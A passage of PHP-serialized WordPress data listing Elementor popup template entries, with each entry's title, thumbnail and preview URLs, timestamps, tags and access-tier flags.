Company\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/delivery-company-88-small.jpg\";s:12:\"tmpl_created\";i:1647770834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-delivery-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Discount\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:56;a:21:{s:4:\"tmpl\";i:1339;s:2:\"id\";i:22959;s:5:\"title\";s:29:\"Classic | Discount | Eco Shop\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/echo-shop-89-small.jpg\";s:12:\"tmpl_created\";i:1647771211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-discount-eco-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:57;a:21:{s:4:\"tmpl\";i:1340;s:2:\"id\";i:22972;s:5:\"title\";s:54:\"Fly-In | Subscription | Health &#038; Mindfulness Blog\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small.jpg\";s:12:\"tmpl_created\";i:1647771461;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/fly-in-subscription-health-mindfulness-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:21:\"[\"Health\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:58;a:21:{s:4:\"tmpl\";i:1341;s:2:\"id\";i:22982;s:5:\"title\";s:31:\"Full Screen | Menu | Art Museum\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/art-museum-112-small.jpg\";s:12:\"tmpl_created\";i:1647771938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-art-museum/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:59;a:21:{s:4:\"tmpl\";i:1342;s:2:\"id\";i:22992;s:5:\"title\";s:40:\"Classic | Discount | Urban Clothing Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small-1.jpg\";s:12:\"tmpl_created\";i:1647773067;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-urban-clothing-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Discount\",\"Ecommerce\",\"Fashion\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:60;a:21:{s:4:\"tmpl\";i:1343;s:2:\"id\";i:23004;s:5:\"title\";s:60:\"Full Screen | Menu | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small-1.jpg\";s:12:\"tmpl_created\";i:1647773366;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:155:\"https://library.elementor.com/popups/full-screen-menu-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:61;a:21:{s:4:\"tmpl\";i:1344;s:2:\"id\";i:23015;s:5:\"title\";s:62:\"Bottom Bar | Contact | Digital &#038; Technology Design School\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small.jpg\";s:12:\"tmpl_created\";i:1647773492;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/bottom-bar-contact-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:23:\"[\"Contact\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:62;a:21:{s:4:\"tmpl\";i:1345;s:2:\"id\";i:23025;s:5:\"title\";s:32:\"Full Screen | Menu | Flower Shop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small.jpg\";s:12:\"tmpl_created\";i:1647773820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:63;a:21:{s:4:\"tmpl\";i:1346;s:2:\"id\";i:23037;s:5:\"title\";s:36:\"Classic | Subscription | Flower Shop\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small-1.jpg\";s:12:\"tmpl_created\";i:1647773949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:64;a:21:{s:4:\"tmpl\";i:1347;s:2:\"id\";i:23056;s:5:\"title\";s:48:\"Classic | Discount | Health &#038; Fitness eBook\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small-1.jpg\";s:12:\"tmpl_created\";i:1647774468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-discount-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:65;a:21:{s:4:\"tmpl\";i:1348;s:2:\"id\";i:23067;s:5:\"title\";s:37:\"Fly-In | Menu | Baby Sleep Consultant\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small-1.jpg\";s:12:\"tmpl_created\";i:1647778954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:66;a:21:{s:4:\"tmpl\";i:1349;s:2:\"id\";i:23077;s:5:\"title\";s:46:\"Classic | Subscription | Baby Sleep Consultant\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small.jpg\";s:12:\"tmpl_created\";i:1647779074;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/classic-subscription-baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:12:\"[\"Discount\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:67;a:21:{s:4:\"tmpl\";i:1350;s:2:\"id\";i:23090;s:5:\"title\";s:33:\"Full Screen | Menu | Luxury Hotel\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small.jpg\";s:12:\"tmpl_created\";i:1647779390;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/full-screen-menu-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:68;a:21:{s:4:\"tmpl\";i:1351;s:2:\"id\";i:23100;s:5:\"title\";s:31:\"Fly-In | Booking | Luxury Hotel\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small-1.jpg\";s:12:\"tmpl_created\";i:1647779500;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-booking-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Booking\",\"Travel\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:69;a:21:{s:4:\"tmpl\";i:1352;s:2:\"id\";i:23109;s:5:\"title\";s:38:\"Full Screen | Menu | Design Conference\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small.jpg\";s:12:\"tmpl_created\";i:1647779675;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:70;a:21:{s:4:\"tmpl\";i:1353;s:2:\"id\";i:23120;s:5:\"title\";s:41:\"Full Screen | Booking | Design Conference\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small-1.jpg\";s:12:\"tmpl_created\";i:1647779793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/full-screen-booking-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Booking\",\"Conference\",\"Creative\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:71;a:21:{s:4:\"tmpl\";i:1354;s:2:\"id\";i:23129;s:5:\"title\";s:29:\"Slide-In | Menu | VR Headsets\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small.jpg\";s:12:\"tmpl_created\";i:1647781211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/slide-in-menu-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:72;a:21:{s:4:\"tmpl\";i:1355;s:2:\"id\";i:23139;s:5:\"title\";s:31:\"Classic | Contact | VR Headsets\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/VR-headset-small-1.jpg\";s:12:\"tmpl_created\";i:1647781384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-contact-vr-headsets/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:73;a:21:{s:4:\"tmpl\";i:1356;s:2:\"id\";i:23149;s:5:\"title\";s:38:\"Slide-In | Menu | Portrait Photography\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Menu.jpg\";s:12:\"tmpl_created\";i:1647782336;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/slide-in-menu-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:74;a:21:{s:4:\"tmpl\";i:1357;s:2:\"id\";i:23159;s:5:\"title\";s:47:\"Hello Bar | Subscription | Portrait Photography\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2022/03/48-portrair-photography-Subscription.jpg\";s:12:\"tmpl_created\";i:1647782478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/hello-bar-subscription-portrait-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Blog\",\"Photography\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:75;a:21:{s:4:\"tmpl\";i:1358;s:2:\"id\";i:23169;s:5:\"title\";s:32:\"Full Screen | Menu | English Pub\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Menu.jpg\";s:12:\"tmpl_created\";i:1647782664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:76;a:21:{s:4:\"tmpl\";i:1359;s:2:\"id\";i:23179;s:5:\"title\";s:32:\"Classic | Discount | English Pub\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/49-englisg-pub-Discount.jpg\";s:12:\"tmpl_created\";i:1647782796;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-discount-english-pub/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:20:\"[\"Discount\",\"Offer\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:77;a:21:{s:4:\"tmpl\";i:1360;s:2:\"id\";i:23189;s:5:\"title\";s:27:\"Full Screen | Menu | Singer\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Menu.jpg\";s:12:\"tmpl_created\";i:1647783070;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/full-screen-menu-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:29:\"[\"Fullscreen\",\"menu\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:78;a:21:{s:4:\"tmpl\";i:1361;s:2:\"id\";i:23200;s:5:\"title\";s:31:\"Classic | Subscription | Singer\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/58-Music-Artist-Subscription.jpg\";s:12:\"tmpl_created\";i:1647783249;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-subscription-singer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Music\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:79;a:21:{s:4:\"tmpl\";i:1362;s:2:\"id\";i:23210;s:5:\"title\";s:38:\"Full Screen | Menu | Virtual Assistant\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/virtual-assistnt-73-small.jpg\";s:12:\"tmpl_created\";i:1647784292;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:80;a:21:{s:4:\"tmpl\";i:1363;s:2:\"id\";i:23223;s:5:\"title\";s:39:\"Hello Bar | Contact | Virtual Assistant\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/73-Virtual-Assistant-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647784616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/hello-bar-contact-virtual-assistant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:37:\"[\"Contact\",\"Psychologist\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:81;a:21:{s:4:\"tmpl\";i:1364;s:2:\"id\";i:23234;s:5:\"title\";s:32:\"Slide-In  | Menu | Personal 